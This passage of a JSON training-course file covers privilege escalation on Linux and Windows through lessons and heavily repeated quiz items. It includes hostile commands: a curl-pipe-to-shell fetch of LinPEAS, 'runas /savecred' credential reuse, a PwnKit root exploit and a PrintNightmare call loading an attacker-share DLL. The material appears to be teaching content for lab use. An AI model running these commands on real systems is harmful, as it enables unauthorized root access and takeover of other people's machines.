state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-schtask","cat":"Privilege Escalation","title":"Windows Scheduled Tasks","diff":2,"xp":150,"intro":"Exploit writable task scripts.","sections":[{"type":"text","content":"Exploit writable task scripts."},{"type":"code","lang":"bash","content":"schtasks /query /fo LIST /v\nicacls C:path\\to\\task.bat"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Task listing tool?","opts":["at","schtasks /query","tasklist","wmic"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-autologon","cat":"Privilege Escalation","title":"Stored Credentials","diff":1,"xp":100,"intro":"Find cached passwords.","sections":[{"type":"text","content":"Find cached passwords."},{"type":"code","lang":"bash","content":"reg query 'HKLM...Winlogon'\ncmdkey /list\nrunas /savecred /user:admin cmd.exe"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Autologon creds location?","opts":["SAM","Registry (Winlogon)","AD","LSASS"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-pspy","cat":"Privilege Escalation","title":"Process Monitoring (pspy)","diff":1,"xp":75,"intro":"Monitor processes without root.","sections":[{"type":"text","content":"Monitor processes without root."},{"type":"code","lang":"bash","content":"./pspy64\n# Watch for root cron jobs, scripts, patterns"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"pspy monitors?","opts":["Network","Running processes","File changes","Memory"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-enum","cat":"Privilege Escalation","title":"Linux Enum Scripts","diff":1,"xp":75,"intro":"Automate privesc enum.","sections":[{"type":"text","content":"Automate privesc enum."},{"type":"code","lang":"bash","content":"curl -L .../linpeas.sh | sh\n./LinEnum.sh"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Best Linux privesc scanner?","opts":["LinEnum","LinPEAS","exploit-suggester","pspy"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-enum","cat":"Privilege Escalation","title":"Windows Enum Scripts","diff":1,"xp":75,"intro":"Automate Windows privesc.","sections":[{"type":"text","content":"Automate Windows privesc."},{"type":"code","lang":"bash","content":".winPEASx64.exe\nInvoke-AllChecks # PowerUp"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Windows privesc tool?","opts":["Mimikatz","WinPEAS","BloodHound","Rubeus"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-polkit","cat":"Privilege Escalation","title":"Linux PwnKit","diff":2,"xp":150,"intro":"Polkit pkexec exploit.","sections":[{"type":"text","content":"Polkit pkexec exploit."},{"type":"code","lang":"bash","content":"./PwnKit # instant root on most Linux"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"PwnKit exploits?","opts":["sudo","pkexec","su","doas"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"win-printspooler","cat":"Privilege Escalation","title":"Print Spooler Exploits","diff":3,"xp":200,"intro":"PrintNightmare.","sections":[{"type":"text","content":"PrintNightmare."},{"type":"code","lang":"bash","content":"python3 CVE-2021-34527.py domain/user:pass@target 'atkshareevil.dll'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"PrintNightmare exploits?","opts":["WMI","Print Spooler","RDP","DNS"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-overview","cat":"Privilege Escalation","title":"Linux Privesc Overview","diff":1,"xp":75,"intro":"Systematic approach.","sections":[{"type":"text","content":"Systematic approach."},{"type":"code","lang":"bash","content":"whoami && id\nsudo -l\nfind / -perm -4000\ncat /etc/crontab\nuname -r"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"First privesc step?","opts":["Run exploit","Enumerate","Install tools","Scan network"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file 